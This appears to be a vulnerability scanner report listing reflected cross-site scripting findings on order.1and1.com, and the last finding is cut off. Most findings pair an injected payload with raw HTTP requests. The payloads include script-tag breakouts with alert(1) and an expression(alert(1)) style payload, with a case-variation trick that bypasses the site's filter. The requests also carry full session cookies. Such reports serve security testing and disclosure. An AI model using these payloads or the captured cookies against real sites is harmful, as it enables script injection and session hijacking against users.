GET /xml/order/FeatureSite-buildingDsc;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The value of REST URL parameter 3 submitted to the URL /xml/order/FeatureSite-buildingElements is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/FeatureSite-buildingElements. The payload 5314a</ScRiPt%20>fdf961380df was submitted in the REST URL parameter 3. This input was returned as 5314a</ScRiPt >fdf961380df in a subsequent request for the URL /xml/order/FeatureSite-buildingElements.
This behaviour demonstrates that it is possible to can close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Request 1
GET /xml/order/FeatureSite-buildingElements5314a</ScRiPt%20>fdf961380df;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
Request 2
GET /xml/order/FeatureSite-buildingElements;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The value of REST URL parameter 3 submitted to the URL /xml/order/FeatureSite-buildingPhotogallery is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/FeatureSite-buildingPhotogallery. The payload 99bea</ScRiPt%20>57d930332ed was submitted in the REST URL parameter 3. This input was returned as 99bea</ScRiPt >57d930332ed in a subsequent request for the URL /xml/order/FeatureSite-buildingPhotogallery.
This behaviour demonstrates that it is possible to can close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Request 1
GET /xml/order/FeatureSite-buildingPhotogallery99bea</ScRiPt%20>57d930332ed;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
Request 2
GET /xml/order/FeatureSite-buildingPhotogallery;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The value of REST URL parameter 3 submitted to the URL /xml/order/FeatureSite-buildingWsb is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/FeatureSite-buildingWsb. The payload 8a254</ScRiPt%20>517ec0551f8 was submitted in the REST URL parameter 3. This input was returned as 8a254</ScRiPt >517ec0551f8 in a subsequent request for the URL /xml/order/FeatureSite-buildingWsb.
This behaviour demonstrates that it is possible to can close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Request 1
GET /xml/order/FeatureSite-buildingWsb8a254</ScRiPt%20>517ec0551f8;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
Request 2
GET /xml/order/FeatureSite-buildingWsb;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The value of REST URL parameter 3 submitted to the URL /xml/order/Gtc is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/Gtc. The payload c5e5c</ScRiPt%20>78e706dc8a4 was submitted in the REST URL parameter 3. This input was returned as c5e5c</ScRiPt >78e706dc8a4 in a subsequent request for the URL /xml/order/Gtc.
This behaviour demonstrates that it is possible to can close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Request 1
GET /xml/order/Gtcc5e5c</ScRiPt%20>78e706dc8a4;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=ft.nav.tandc HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
Request 2
GET /xml/order/Gtc;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=ft.nav.tandc HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The value of REST URL parameter 3 submitted to the URL /xml/order/Home is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/Home. The payload 92d59</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>89b6bbee8d was submitted in the REST URL parameter 3. This input was returned as 92d59</ScRiPt ><ScRiPt>alert(1)</ScRiPt>89b6bbee8d in a subsequent request for the URL /xml/order/Home.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Request 1
GET /xml/order/Home92d59</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>89b6bbee8d;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__reuse=1300632650912 HTTP/1.1 Host: order.1and1.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_TST_=7f633103f81ccc00; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; UT=7aF0tMDEnUFBQYXRqcTdvaTYoMmteWDBHOjQcIB0dHBozMS4uMTAqLTEkJiUkIUY0YFVXZR0fGmE6ZHM5LC0pKC0pJyooIiohIClhYigbO2t0Oi0uKikuKigrKSMrIiE=
Request 2
GET /xml/order/Home;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__reuse=1300632650912 HTTP/1.1 Host: order.1and1.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_TST_=7f633103f81ccc00; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; UT=7aF0tMDEnUFBQYXRqcTdvaTYoMmteWDBHOjQcIB0dHBozMS4uMTAqLTEkJiUkIUY0YFVXZR0fGmE6ZHM5LC0pKC0pJyooIiohIClhYigbO2t0Oi0uKikuKigrKSMrIiE=
The value of REST URL parameter 3 submitted to the URL /xml/order/Hosting is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/Hosting. The payload f884f</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>89d857b9fc1 was submitted in the REST URL parameter 3. This input was returned as f884f</ScRiPt ><ScRiPt>alert(1)</ScRiPt>89d857b9fc1 in a subsequent request for the URL /xml/order/Hosting.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
The value of REST URL parameter 3 submitted to the URL /xml/order/Hosting is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/Hosting. The payload af2f1</ScRiPt%20>54b667825a6 was submitted in the REST URL parameter 3. This input was returned as af2f1</ScRiPt >54b667825a6 in a subsequent request for the URL /xml/order/Hosting.
This behaviour demonstrates that it is possible to can close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
The value of REST URL parameter 3 submitted to the URL /xml/order/Hosting is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/Hosting. The payload 2a1d6</ScRiPt%20><x%20style%3dx%3aexpression(alert(1))>596a15d5308 was submitted in the REST URL parameter 3. This input was returned as 2a1d6</ScRiPt ><x style=x:expression(alert(1))>596a15d5308 in a subsequent request for the URL /xml/order/Hosting.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Request 1
GET /xml/order/Hosting2a1d6</ScRiPt%20><x%20style%3dx%3aexpression(alert(1))>596a15d5308;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Static HTTP/1.1 Host: order.1and1.com Proxy-Connection: keep-alive Referer: http://order.1and1.com/xml/order/Home;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__reuse=1300642626825 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: lastpage=Home; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=4ce5cf5491256400; UT=8Z1wsLzAmT09mYHNpcDZuaDUnMWpdVy9GOTMbHxwcGzAyMC0tMC8pLDAjJSQjIEUzX1RWZBweMGA5Y3I4KywoJywoJiknISkgHyhgYSczOmpzOSwtKSgtKicqJSgpIiM=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:6:AAABLtRX2K_J5jNaUkl1B0HVVvj*yNyZ:1300642650287; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10
Request 2
GET /xml/order/Hosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Static HTTP/1.1 Host: order.1and1.com Proxy-Connection: keep-alive Referer: http://order.1and1.com/xml/order/Home;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__reuse=1300642626825 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: lastpage=Home; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=4ce5cf5491256400; UT=8Z1wsLzAmT09mYHNpcDZuaDUnMWpdVy9GOTMbHxwcGzAyMC0tMC8pLDAjJSQjIEUzX1RWZBweMGA5Y3I4KywoJywoJiknISkgHyhgYSczOmpzOSwtKSgtKicqJSgpIiM=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:6:AAABLtRX2K_J5jNaUkl1B0HVVvj*yNyZ:1300642650287; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10
The value of REST URL parameter 3 submitted to the URL /xml/order/Instant is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/Instant. The payload 92e84</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>9555bc59727 was submitted in the REST URL parameter 3. This input was returned as 92e84</ScRiPt ><ScRiPt>alert(1)</ScRiPt>9555bc59727 in a subsequent request for the URL /xml/order/Instant.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Request 1
GET /xml/order/Instant92e84</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>9555bc59727;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.domains HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
Request 2
GET /xml/order/Instant;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.domains HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The value of REST URL parameter 3 submitted to the URL /xml/order/MailInstantMail is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/MailInstantMail. The payload 17be3</ScRiPt%20>4a6827ab2d was submitted in the REST URL parameter 3. This input was returned as 17be3</ScRiPt >4a6827ab2d in a subsequent request for the URL /xml/order/MailInstantMail.
This behaviour demonstrates that it is possible to can close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Request 1
GET /xml/order/MailInstantMail17be3</ScRiPt%20>4a6827ab2d;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.domains HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
Request 2
